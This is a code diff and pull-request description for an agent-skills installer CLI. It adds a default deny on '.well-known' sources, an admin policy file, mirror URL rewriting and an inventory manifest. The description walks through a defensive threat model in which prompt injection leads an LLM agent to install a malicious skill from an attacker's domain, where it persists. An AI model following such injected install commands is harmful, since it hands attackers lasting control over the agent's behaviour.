-  proxy?: string;
+  mirror?: MirrorConfig;
   require_locked_hash?: boolean;
 }
 
@@ -49,7 +70,14 @@ export interface PolicyDecision {
     | 'allow_sources'
     | 'deny_sources'
     | 'well_known_default'
-    | 'cli_flag';
+    | 'cli_flag'
+    | 'mirror_rewrite';
+  /**
+   * When set, the caller must replace `parsed.url` with this value before
+   * any network call. Produced by `proxy_only` + a matching `mirror.providers`
+   * entry. The rewrite is a one-shot; it is not re-evaluated by the policy.
+   */
+  rewriteTo?: string;
 }
 
 /** Default behavior when no policy file is found AND no flag overrides it. */
@@ -73,6 +101,36 @@ function validatePolicy(raw: unknown, sourcePath: string): Policy {
     throw new Error(
       `Invalid policy file at ${sourcePath}: unsupported version ${String(r.version)} (expected 1)`
     );
+  }
+  // well_known cannot be proxy_only: there's no upstream identity to mirror.
+  // Fail loud at load time rather than at fetch time.
+  const providers = r.providers as Record<string, unknown> | undefined;
+  if (providers && providers.well_known === 'proxy_only') {
+    throw new Error(
+      `Invalid policy file at ${sourcePath}: providers.well_known cannot be "proxy_only" — well-known is the any-host fallback and has no upstream to mirror. Use "allow" or "deny".`
+    );
+  }
+  // Mirror must have a non-empty providers list — empty list is almost
+  // certainly a configuration mistake (mirror configured but never used).
+  const mirror = r.mirror as Record<string, unknown> | undefined;
+  if (mirror) {
+    if (typeof mirror.url !== 'string' || !mirror.url) {
+      throw new Error(
+        `Invalid policy file at ${sourcePath}: mirror.url must be a non-empty string`
+      );
+    }
+    if (!Array.isArray(mirror.providers) || mirror.providers.length === 0) {
+      throw new Error(
+        `Invalid policy file at ${sourcePath}: mirror.providers must be a non-empty array`
+      );
+    }
+    for (const p of mirror.providers) {
+      if (p === 'well_known' || p === 'local') {
+        throw new Error(
+          `Invalid policy file at ${sourcePath}: mirror.providers cannot include "${p}"`
+        );
+      }
+    }
   }
   return r as unknown as Policy;
 }
@@ -136,6 +194,41 @@ function matchesGlob(pattern: string, value: string): boolean {
  * matching. Format: "<host>/<owner>/<repo>" for hosted providers,
  * "<host><path>" for well-known, "local" for local paths.
  */
+/**
+ * Compute the rewritten URL for a source routed through the mirror.
+ * Returns null if the mirror is not configured for this provider.
+ *
+ * Path shape: `${mirror.url}/${originalHost}/${originalPathWithoutLeadingSlash}`.
+ * Matches Go's GOPROXY model (`${proxy}/${module-path}`); admins configure
+ * Artifactory / Nexus / JFrog generic-remote or VCS-remote repos to match.
+ */
+function computeMirrorRewrite(
+  parsed: ParsedSource,
+  policy: Policy | null,
+  providerId: ProviderId
+): string | null {
+  if (!policy?.mirror) return null;
+  if (providerId === 'well_known' || providerId === 'local') return null;
+  if (!policy.mirror.providers.includes(providerId as MirrorableProviderId)) return null;
+
+  let host: string;
+  let pathPart: string;
+  try {
+    const u = new URL(parsed.url);
+    host = u.hostname;
+    pathPart = u.pathname.replace(/^\/+/, '');
+  } catch {
+    // SSH URLs like git@github.com:owner/repo: rewrite to https form.
+    const ssh = parsed.url.match(/^git@([^:]+):(.+)$/);
+    if (!ssh) return null;
+    host = ssh[1]!;
+    pathPart = ssh[2]!;
+  }
+
+  const base = policy.mirror.url.replace(/\/+$/, '');
+  return `${base}/${host}/${pathPart}`;
+}
+
 function sourceIdentifier(parsed: ParsedSource): string {
   if (parsed.type === 'local') return 'local';
   try {
@@ -199,9 +292,21 @@ export function evaluatePolicy(input: EvaluateInput): PolicyDecision {
     };
   }
   if (effective === 'proxy_only') {
+    const rewritten = computeMirrorRewrite(parsed, policy, providerId);
+    if (rewritten) {
+      return {
+        allowed: true,
+        reason: `provider "${providerId}" is proxied through mirror ${policy?.mirror?.url}`,
+        mechanism: 'mirror_rewrite',
+        rewriteTo: rewritten,
+      };
+    }
     return {
       allowed: false,
-      reason: `provider "${providerId}" is set to "proxy_only" but proxy enforcement is not yet implemented (planned follow-up). Use "allow" or "deny" for now, or pin to a mirror via allow_sources.`,
+      reason:
+        providerId === 'well_known'
+          ? `well_known cannot be "proxy_only" — it is the any-host fallback and has no upstream identity to mirror`
+          : `provider "${providerId}" is "proxy_only" but no mirror is configured for it (set policy.mirror.url and include "${providerId}" in policy.mirror.providers)`,
       mechanism: providerRule ? 'provider' : 'default',
     };
   }

--- a/src/remove.ts
+++ b/src/remove.ts
@@ -6,6 +6,7 @@ import { agents, detectInstalledAgents } from './agents.ts';
 import { track } from './telemetry.ts';
 import { detectAgent } from './detect-agent.ts';
 import { removeSkillFromLock, getSkillFromLock } from './skill-lock.ts';
+import { recordSkillRemove } from './inventory.ts';
 import type { AgentType } from './types.ts';
 import {
   getInstallPath,
@@ -226,6 +227,16 @@ export async function removeCommand(skillNames: string[], options: RemoveOptions
 
       if (isGlobal) {
         await removeSkillFromLock(skillName);
+      }
+
+      try {
+        await recordSkillRemove({
+          name: skillName,
+          scope: isGlobal ? 'global' : 'project',
+          project_path: isGlobal ? undefined : process.cwd(),
+        });
+      } catch {
+        /* never block remove on inventory write */
       }
 
       results.push({

--- a/tests/inventory.test.ts
+++ b/tests/inventory.test.ts
@@ -1,0 +1,118 @@
+import { describe, expect, it, beforeEach, afterEach } from 'vitest';
+import { mkdtemp, rm, readFile } from 'node:fs/promises';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import {
+  recordSkillInstall,
+  recordSkillRemove,
+  readInventory,
+  getInventoryPath,
+  INVENTORY_VERSION,
+} from '../src/inventory.ts';
+
+// The inventory module reads HOME at call time, so we can redirect it
+// per-test by mutating process.env.HOME.
+
+describe('inventory manifest', () => {
+  let fakeHome: string;
+  let originalHome: string | undefined;
+
+  beforeEach(async () => {
+    fakeHome = await mkdtemp(join(tmpdir(), 'inv-'));
+    originalHome = process.env.HOME;
+    process.env.HOME = fakeHome;
+  });
+
+  afterEach(async () => {
+    if (originalHome !== undefined) process.env.HOME = originalHome;
+    else delete process.env.HOME;
+    await rm(fakeHome, { recursive: true, force: true });
+  });
+
+  it('returns an empty inventory when no file exists', async () => {
+    const inv = await readInventory();
+    expect(inv.version).toBe(INVENTORY_VERSION);
+    expect(inv.skills).toEqual([]);
+  });
+
+  it('records an install and persists it', async () => {
+    await recordSkillInstall({
+      name: 'frontend-design',
+      source: 'github.com/vercel-labs/agent-skills',
+      scope: 'global',
+      installed_at: '2026-05-25T10:00:00Z',
+      provider_id: 'github',
+    });
+    const inv = await readInventory();
+    expect(inv.skills).toHaveLength(1);
+    expect(inv.skills[0]!.name).toBe('frontend-design');
+    expect(inv.skills[0]!.source).toBe('github.com/vercel-labs/agent-skills');
+
+    // File actually exists at the expected path under fake HOME.
+    const path = getInventoryPath();
+    expect(path).toBe(join(fakeHome, '.agents', 'skills-inventory.json'));
+    const raw = JSON.parse(await readFile(path, 'utf-8'));
+    expect(raw.version).toBe(INVENTORY_VERSION);
+  });
+
+  it('is idempotent on (name, scope, project_path) — re-install replaces, does not duplicate', async () => {
+    await recordSkillInstall({
+      name: 'x',
+      source: 'github.com/a/b',
+      scope: 'global',
+      installed_at: '2026-05-25T10:00:00Z',
+    });
+    await recordSkillInstall({
+      name: 'x',
+      source: 'github.com/a/b',
+      scope: 'global',
+      installed_at: '2026-05-25T11:00:00Z',
+    });
+    const inv = await readInventory();
+    expect(inv.skills).toHaveLength(1);
+    expect(inv.skills[0]!.installed_at).toBe('2026-05-25T11:00:00Z');
+  });
+
+  it('keeps separate entries for the same skill in global vs. project scope', async () => {
+    await recordSkillInstall({
+      name: 'x',
+      source: 'github.com/a/b',
+      scope: 'global',
+      installed_at: '2026-05-25T10:00:00Z',
+    });
+    await recordSkillInstall({
+      name: 'x',
+      source: 'github.com/a/b',
+      scope: 'project',
+      project_path: '/work/repo-a',
+      installed_at: '2026-05-25T10:00:00Z',
+    });
+    await recordSkillInstall({
+      name: 'x',
+      source: 'github.com/a/b',
+      scope: 'project',
+      project_path: '/work/repo-b',
+      installed_at: '2026-05-25T10:00:00Z',
+    });
+    const inv = await readInventory();
+    expect(inv.skills).toHaveLength(3);
+  });
+
+  it('remove deletes the matching entry only', async () => {
+    await recordSkillInstall({
+      name: 'x',
+      source: 'github.com/a/b',
+      scope: 'global',
+      installed_at: '2026-05-25T10:00:00Z',
+    });
+    await recordSkillInstall({
+      name: 'y',
+      source: 'github.com/a/c',
+      scope: 'global',
+      installed_at: '2026-05-25T10:00:00Z',
+    });
+    await recordSkillRemove({ name: 'x', scope: 'global' });
+    const inv = await readInventory();
+    expect(inv.skills.map((s) => s.name)).toEqual(['y']);
+  });
+});

--- a/tests/policy-load.test.ts
+++ b/tests/policy-load.test.ts
@@ -34,12 +34,12 @@ describe('loadPolicy schema validation', () => {
     expect(sourcePath).toBeNull();
   });
 
-  it('rejects well_known: proxy_only at load time', async () => {
+  it('rejects .well-known: proxy_only at load time', async () => {
     await writeFile(
       join(cwd, '.skills-policy.json'),
-      JSON.stringify({ version: 1, providers: { well_known: 'proxy_only' } })
+      JSON.stringify({ version: 1, providers: { '.well-known': 'proxy_only' } })
     );
-    expect(() => loadPolicy(cwd)).toThrow(/well_known cannot be "proxy_only"/);
+    expect(() => loadPolicy(cwd)).toThrow(/cannot be "proxy_only"/);
   });
 
   it('rejects mirror with empty providers list', async () => {
@@ -53,15 +53,15 @@ describe('loadPolicy schema validation', () => {
     expect(() => loadPolicy(cwd)).toThrow(/mirror.providers must be a non-empty array/);
   });
 
-  it('rejects mirror.providers containing well_known', async () => {
+  it('rejects mirror.providers containing .well-known', async () => {
     await writeFile(
       join(cwd, '.skills-policy.json'),
       JSON.stringify({
         version: 1,
-        mirror: { url: 'https://mirror.corp', providers: ['well_known'] },
+        mirror: { url: 'https://mirror.corp', providers: ['.well-known'] },
       })
     );
-    expect(() => loadPolicy(cwd)).toThrow(/mirror.providers cannot include "well_known"/);
+    expect(() => loadPolicy(cwd)).toThrow(/mirror.providers cannot include ".well-known"/);
   });
 
   it('accepts a valid mirror configuration', async () => {

--- a/tests/policy-load.test.ts
+++ b/tests/policy-load.test.ts
@@ -1,0 +1,100 @@
+import { describe, expect, it, beforeEach, afterEach } from 'vitest';
+import { mkdtemp, rm, writeFile, mkdir } from 'node:fs/promises';
+import { join } from 'node:path';
+import { tmpdir } from 'node:os';
+import { loadPolicy } from '../src/policy.ts';
+
+describe('loadPolicy schema validation', () => {
+  let fakeHome: string;
+  let cwd: string;
+  let originalHome: string | undefined;
+  let originalEnv: string | undefined;
+
+  beforeEach(async () => {
+    fakeHome = await mkdtemp(join(tmpdir(), 'pol-home-'));
+    cwd = await mkdtemp(join(tmpdir(), 'pol-cwd-'));
+    originalHome = process.env.HOME;
+    originalEnv = process.env.SKILLS_POLICY;
+    process.env.HOME = fakeHome;
+    delete process.env.SKILLS_POLICY;
+  });
+
+  afterEach(async () => {
+    if (originalHome !== undefined) process.env.HOME = originalHome;
+    else delete process.env.HOME;
+    if (originalEnv !== undefined) process.env.SKILLS_POLICY = originalEnv;
+    else delete process.env.SKILLS_POLICY;
+    await rm(fakeHome, { recursive: true, force: true });
+    await rm(cwd, { recursive: true, force: true });
+  });
+
+  it('returns null when no policy file exists', () => {
+    const { policy, sourcePath } = loadPolicy(cwd);
+    expect(policy).toBeNull();
+    expect(sourcePath).toBeNull();
+  });
+
+  it('rejects well_known: proxy_only at load time', async () => {
+    await writeFile(
+      join(cwd, '.skills-policy.json'),
+      JSON.stringify({ version: 1, providers: { well_known: 'proxy_only' } })
+    );
+    expect(() => loadPolicy(cwd)).toThrow(/well_known cannot be "proxy_only"/);
+  });
+
+  it('rejects mirror with empty providers list', async () => {
+    await writeFile(
+      join(cwd, '.skills-policy.json'),
+      JSON.stringify({
+        version: 1,
+        mirror: { url: 'https://mirror.corp', providers: [] },
+      })
+    );
+    expect(() => loadPolicy(cwd)).toThrow(/mirror.providers must be a non-empty array/);
+  });
+
+  it('rejects mirror.providers containing well_known', async () => {
+    await writeFile(
+      join(cwd, '.skills-policy.json'),
+      JSON.stringify({
+        version: 1,
+        mirror: { url: 'https://mirror.corp', providers: ['well_known'] },
+      })
+    );
+    expect(() => loadPolicy(cwd)).toThrow(/mirror.providers cannot include "well_known"/);
+  });
+
+  it('accepts a valid mirror configuration', async () => {
+    await writeFile(
+      join(cwd, '.skills-policy.json'),
+      JSON.stringify({
+        version: 1,
+        providers: { github: 'proxy_only' },
+        mirror: { url: 'https://artifactory.corp/agent-skills', providers: ['github', 'gitlab'] },
+      })
+    );
+    const { policy } = loadPolicy(cwd);
+    expect(policy?.mirror?.url).toBe('https://artifactory.corp/agent-skills');
+    expect(policy?.mirror?.providers).toEqual(['github', 'gitlab']);
+  });
+
+  it('respects lookup precedence: $SKILLS_POLICY > cwd > home', async () => {
+    await mkdir(join(fakeHome, '.agents'), { recursive: true });
+    await writeFile(
+      join(fakeHome, '.agents', 'skills-policy.json'),
+      JSON.stringify({ version: 1, default: 'allow' })
+    );
+    await writeFile(
+      join(cwd, '.skills-policy.json'),
+      JSON.stringify({ version: 1, default: 'deny' })
+    );
+    expect(loadPolicy(cwd).policy?.default).toBe('deny');
+
+    const envPath = join(cwd, 'env-policy.json');
+    await writeFile(envPath, JSON.stringify({ version: 1, providers: { github: 'deny' } }));
+    process.env.SKILLS_POLICY = envPath;
+    const loaded = loadPolicy(cwd);
+    expect(loaded.policy?.providers?.github).toBe('deny');
+    expect(loaded.policy?.default).toBeUndefined();
+  });
+});

--- a/tests/policy.test.ts
+++ b/tests/policy.test.ts
@@ -16,7 +16,7 @@ describe('evaluatePolicy', () => {
   it('default-denies well-known when no policy and no flag', () => {
     const d = evaluatePolicy({ parsed: wk(), policy: null });
     expect(d.allowed).toBe(false);
-    expect(d.mechanism).toBe('well_known_default');
+    expect(d.mechanism).toBe('well-known-default');
   });
 
   it('allows well-known when --allow-well-known flag is set', () => {
@@ -78,7 +78,7 @@ describe('evaluatePolicy', () => {
   it('explicit policy can re-enable well-known fleet-wide', () => {
     const d = evaluatePolicy({
       parsed: wk('skills.acme.corp'),
-      policy: { version: 1, providers: { well_known: 'allow' } },
+      policy: { version: 1, providers: { '.well-known': 'allow' } },
     });
     expect(d.allowed).toBe(true);
     expect(d.mechanism).toBe('provider');

--- a/tests/policy.test.ts
+++ b/tests/policy.test.ts
@@ -84,14 +84,64 @@ describe('evaluatePolicy', () => {
     expect(d.mechanism).toBe('provider');
   });
 
-  it('proxy_only is parsed but rejected with a forward-looking error', () => {
+  it('proxy_only without a configured mirror denies with a helpful error', () => {
     const d = evaluatePolicy({
       parsed: gh(),
       policy: { version: 1, providers: { github: 'proxy_only' } },
     });
     expect(d.allowed).toBe(false);
-    expect(d.reason).toMatch(/proxy_only/);
-    expect(d.reason).toMatch(/follow-up/);
+    expect(d.reason).toMatch(/no mirror is configured/);
+    expect(d.reason).toMatch(/policy.mirror.url/);
+  });
+
+  it('proxy_only with mirror rewrites to GOPROXY-shaped URL', () => {
+    const d = evaluatePolicy({
+      parsed: gh('vercel-labs/agent-skills'),
+      policy: {
+        version: 1,
+        providers: { github: 'proxy_only' },
+        mirror: {
+          url: 'https://artifactory.corp/agent-skills',
+          providers: ['github'],
+        },
+      },
+    });
+    expect(d.allowed).toBe(true);
+    expect(d.mechanism).toBe('mirror_rewrite');
+    expect(d.rewriteTo).toBe(
+      'https://artifactory.corp/agent-skills/github.com/vercel-labs/agent-skills'
+    );
+  });
+
+  it('proxy_only with mirror but provider not in providers[] denies', () => {
+    const d = evaluatePolicy({
+      parsed: gh(),
+      policy: {
+        version: 1,
+        providers: { github: 'proxy_only' },
+        mirror: {
+          url: 'https://artifactory.corp/agent-skills',
+          providers: ['gitlab'], // github not listed
+        },
+      },
+    });
+    expect(d.allowed).toBe(false);
+    expect(d.reason).toMatch(/no mirror is configured/);
+  });
+
+  it('mirror url trailing slash and host/path are joined cleanly', () => {
+    const d = evaluatePolicy({
+      parsed: gh('foo/bar'),
+      policy: {
+        version: 1,
+        providers: { github: 'proxy_only' },
+        mirror: {
+          url: 'https://artifactory.corp/agent-skills/',
+          providers: ['github'],
+        },
+      },
+    });
+    expect(d.rewriteTo).toBe('https://artifactory.corp/agent-skills/github.com/foo/bar');
   });
 
   it('glob matcher does not let owner-prefix patterns leak across orgs', () => {

--- a/tests/policy.test.ts
+++ b/tests/policy.test.ts
@@ -1,0 +1,108 @@
+import { describe, expect, it } from 'vitest';
+import { evaluatePolicy } from '../src/policy.ts';
+import type { ParsedSource } from '../src/types.ts';
+
+const gh = (path = 'vercel-labs/agent-skills'): ParsedSource => ({
+  type: 'github',
+  url: `https://github.com/${path}`,
+});
+
+const wk = (host = 'evil.tld'): ParsedSource => ({
+  type: 'well-known',
+  url: `https://${host}`,
+});
+
+describe('evaluatePolicy', () => {
+  it('default-denies well-known when no policy and no flag', () => {
+    const d = evaluatePolicy({ parsed: wk(), policy: null });
+    expect(d.allowed).toBe(false);
+    expect(d.mechanism).toBe('well_known_default');
+  });
+
+  it('allows well-known when --allow-well-known flag is set', () => {
+    const d = evaluatePolicy({ parsed: wk(), policy: null, allowWellKnownFlag: true });
+    expect(d.allowed).toBe(true);
+    expect(d.mechanism).toBe('cli_flag');
+  });
+
+  it('allows github by default with no policy file', () => {
+    const d = evaluatePolicy({ parsed: gh(), policy: null });
+    expect(d.allowed).toBe(true);
+  });
+
+  it('default rule cascades to all providers', () => {
+    const d = evaluatePolicy({
+      parsed: gh(),
+      policy: { version: 1, default: 'deny' },
+    });
+    expect(d.allowed).toBe(false);
+    expect(d.mechanism).toBe('default');
+  });
+
+  it('per-provider override beats default', () => {
+    const d = evaluatePolicy({
+      parsed: gh(),
+      policy: { version: 1, default: 'deny', providers: { github: 'allow' } },
+    });
+    expect(d.allowed).toBe(true);
+    expect(d.mechanism).toBe('provider');
+  });
+
+  it('allow_sources beats default-deny', () => {
+    const d = evaluatePolicy({
+      parsed: gh('acme-corp/skills'),
+      policy: {
+        version: 1,
+        default: 'deny',
+        allow_sources: ['github.com/acme-corp/*'],
+      },
+    });
+    expect(d.allowed).toBe(true);
+    expect(d.mechanism).toBe('allow_sources');
+  });
+
+  it('deny_sources beats allow_sources match', () => {
+    const d = evaluatePolicy({
+      parsed: gh('acme-corp/sketchy'),
+      policy: {
+        version: 1,
+        default: 'allow',
+        allow_sources: ['github.com/acme-corp/*'],
+        deny_sources: ['github.com/acme-corp/sketchy'],
+      },
+    });
+    expect(d.allowed).toBe(false);
+    expect(d.mechanism).toBe('deny_sources');
+  });
+
+  it('explicit policy can re-enable well-known fleet-wide', () => {
+    const d = evaluatePolicy({
+      parsed: wk('skills.acme.corp'),
+      policy: { version: 1, providers: { well_known: 'allow' } },
+    });
+    expect(d.allowed).toBe(true);
+    expect(d.mechanism).toBe('provider');
+  });
+
+  it('proxy_only is parsed but rejected with a forward-looking error', () => {
+    const d = evaluatePolicy({
+      parsed: gh(),
+      policy: { version: 1, providers: { github: 'proxy_only' } },
+    });
+    expect(d.allowed).toBe(false);
+    expect(d.reason).toMatch(/proxy_only/);
+    expect(d.reason).toMatch(/follow-up/);
+  });
+
+  it('glob matcher does not let owner-prefix patterns leak across orgs', () => {
+    const d = evaluatePolicy({
+      parsed: gh('acme-corp-evil/x'),
+      policy: {
+        version: 1,
+        default: 'deny',
+        allow_sources: ['github.com/acme-corp/*'],
+      },
+    });
+    expect(d.allowed).toBe(false);
+  });
+});


### PR DESCRIPTION
## Problem

Today, `npx skills add <url>` will resolve any HTTPS hostname that doesn't match a known provider via the `.well-known` fallback (`src/providers/wellknown.ts`), fetch a `SKILL.md` or archive from it, and install it under `~/.agents/skills/`. From that moment on, the content is loaded into an agent's instruction context on next activation.

Combined with the now-standard threat model where LLM agents process untrusted text (web pages, emails, docs, search results), this is an **indirect-prompt-injection → installed-skill → persistent-RCE-in-agent-authority** channel. A single prompt injection that gets the model to call `skills add <attacker-domain>` results in a malicious skill living on disk indefinitely, executed by the agent every time its description matches a future query.

Adjacent gaps that this PR also addresses:

- **No admin-controllable gate at the resolution layer.** Existing supply-chain primitives (digest pinning in v0.2 well-known schema, `skills-lock.json`, `--dangerously-accept-openclaw-risks` for blob installs) work *after* a source has been picked. There's no way to refuse a class of source before the network call.
- **No durable, machine-readable inventory** of what's installed across a fleet. `skills list --json` is on-demand and per-user; fleet-management agents (Intune detection scripts, JAMF, osquery) need a stable file at a known path.
- **No way to require an internal artifact mirror** (Artifactory / Nexus / JFrog) for fleet installs. Today there is no mechanism to route `github.com/foo/bar` through a corporate mirror — the connection goes direct.

## What this PR does

### 1. Default-deny `.well-known` resolution

`npx skills add example.tld` (anything that falls through to the `.well-known` provider) now errors before any network call with:

```
✗ .well-known resolution is disabled by default for safety

  evil.tld is not a recognized provider (GitHub, GitLab, HuggingFace).
  .well-known endpoints can install arbitrary code from any HTTPS host.
  This vector is commonly exploited via prompt injection of LLM agents.

  To enable:
    • for this command:  skills add evil.tld --allow-well-known
    • for this user:     set providers[".well-known"] = "allow" in ~/.agents/skills-policy.json
```

New flag: `--allow-well-known`. New built-in default: `DEFAULT_WELL_KNOWN_DENY = true` in `src/policy.ts`.

**This is a default behavior change** — flagging explicitly because it can break existing `.well-known` users. Mitigations: clear error with three remediation paths, single-flag opt-in, single-line policy file opt-in.

### 2. Admin-managed policy file

Loaded from the first hit of:

1. `$SKILLS_POLICY` (absolute path)
2. `<cwd>/.skills-policy.json`
3. `~/.agents/skills-policy.json`

Schema (cascade: top-level default + per-provider overrides + source globs + mirror):

```jsonc
{
  "version": 1,
  "default": "allow",
  "providers": {
    ".well-known": "deny",
    "github":      "proxy_only",
    "gitlab":      "allow",
    "git":         "deny",
    "local":       "allow"
  },
  "allow_sources": ["github.com/acme-corp/*"],
  "deny_sources":  ["github.com/sketchy-org/*"],
  "mirror": {
    "url": "https://artifactory.corp/agent-skills",
    "providers": ["github", "gitlab", "git"]
  }
}
```

Precedence (first match wins): `deny_sources` → `allow_sources` → `providers[<id>]` → `default` → built-in defaults. Enforced in `runAdd` immediately after `parseSource`, mirroring the existing openclaw block at the same seam.

The `.well-known` provider id matches the RFC 8615 path prefix it represents; the policy key is literally `".well-known"` (with leading dot and hyphen).

### 3. Mirror routing via `proxy_only`

When a provider's effective rule is `proxy_only` AND `mirror` is configured with that provider in `mirror.providers`, the source URL is rewritten before any clone or fetch:

```
github.com/vercel-labs/agent-skills
  →  https://artifactory.corp/agent-skills/github.com/vercel-labs/agent-skills
```

Path shape: `${mirror.url}/${originalHost}/${originalPath}`. Matches Go's GOPROXY convention; admins configure their Artifactory / Nexus / JFrog remote-VCS or generic-remote repository to expose the upstream at that shape.

**`.well-known` cannot be `proxy_only`.** It's the catch-all "any HTTPS host" fallback and has no stable upstream identity to mirror. Policy load fails loudly if you try. `mirror.providers` similarly cannot contain `.well-known` or `local`.

**Out of scope for this PR (explicit non-goal):** no HTTPS_PROXY / egress proxy handling. That's the OS / network layer's job, not the policy file's — putting transport-level proxying in here would have meant the policy file could MITM the user's other tooling.

### 4. Inventory manifest

`~/.agents/skills-inventory.json`, refreshed on every successful add/remove. Stable schema for fleet-management consumption:

```jsonc
{
  "version": 1,
  "updated_at": "...",
  "skills": [
    {
      "name": "frontend-design",
      "source": "github.com/vercel-labs/agent-skills",
      "ref": "main",
      "scope": "global",
      "project_path": null,
      "installed_at": "...",
      "provider_id": "github"
    }
  ]
}
```

Idempotent on `(name, scope, project_path)`. Best-effort: a failed inventory write never blocks a successful install. Distinct from `skills-lock.json` (per-project resolution graph) — the inventory is per-user-global effective state.

## What this PR deliberately does NOT do

- **No HTTPS_PROXY / egress proxy.** Transport-level proxying belongs in the OS/network layer; the policy file is not the right place to MITM the user's tools.
- **No signing infrastructure.** Hash pinning via `require_locked_hash` is reserved in the schema; not enforced in this PR.
- **No changes to existing providers.** The policy gate is purely additive at the dispatch site.
- **No GUI / config subcommand.** Admins author the policy file directly.

## Open questions (please weigh in)

1. **Default-deny `.well-known`: too aggressive?** I think the prompt-injection threat model justifies it, but it's a real behavior change. Alternatives: (a) interactive confirmation for first-time hosts, (b) leave behavior as-is but document the threat, (c) opt-out env var for the next major version.
2. **Policy file path conventions.** Is `~/.agents/skills-policy.json` the right home? Should the repo-local file be `.skills-policy.json` or `skills-policy.json` (no leading dot, like `skills-lock.json`)?
3. **Glob syntax.** Currently tiny custom matcher (`*` = non-slash, `**` = anything). Should this use micromatch / minimatch instead? Adds a dep but is the obvious choice once patterns get complex.
4. **Inventory location.** `~/.agents/skills-inventory.json` shares a dir with the canonical skills dir. Acceptable, or should it live under a sibling like `~/.agents/state/`?
5. **Mirror path shape.** Currently GOPROXY-style (`${mirror}/${host}/${path}`). Alternative: Artifactory-native (`${mirror}/${repoKey}/${owner}/${repo}`) which is more idiomatic for Artifactory specifically but doesn't extend to arbitrary git hosts. Lean GOPROXY because one shape covers github/gitlab/arbitrary git.
6. **SSH rewrite to HTTPS-shaped mirror.** `git@github.com:foo/bar` currently rewrites to `${mirror}/github.com/foo/bar`. Reasonable, or should the CLI keep SSH-shaped URLs out of the mirror entirely?

## Tests

- `tests/policy.test.ts` — 13 cases: cascade, default-deny `.well-known`, flag override, allow/deny sources, owner-prefix glob safety, mirror rewrite happy path, missing-mirror deny, provider-not-in-mirror.providers deny, trailing-slash normalization.
- `tests/policy-load.test.ts` — 6 cases: empty load, `.well-known: proxy_only` rejection, mirror schema validation, lookup precedence env > cwd > home.
- `tests/inventory.test.ts` — 5 cases: empty read, persist, idempotency on (name,scope,project_path), scope separation, remove.
- Existing test suite: 4 pre-existing failures on `main` reproduce identically on this branch (cli/list/remove/sync banner tests — env-sensitive). New code: zero regressions in `installer-copy` / `installer-symlink` / `add` / source-parser.

## Try it

```bash
# Default-deny .well-known:
npx skills add example.tld
# -> ✗ Installation blocked by policy

# Opt in per-command:
npx skills add example.tld --allow-well-known

# Air-gapped fleet config (everything via Artifactory):
mkdir -p ~/.agents && cat > ~/.agents/skills-policy.json <<JSON
{
  "version": 1,
  "default": "proxy_only",
  "providers": { ".well-known": "deny" },
  "mirror": {
    "url": "https://artifactory.corp/agent-skills",
    "providers": ["github", "gitlab", "git"]
  }
}
JSON
npx skills add vercel-labs/agent-skills
# -> ↻ Routing through mirror: https://artifactory.corp/agent-skills/github.com/vercel-labs/agent-skills

# Inventory after any install:
cat ~/.agents/skills-inventory.json
```
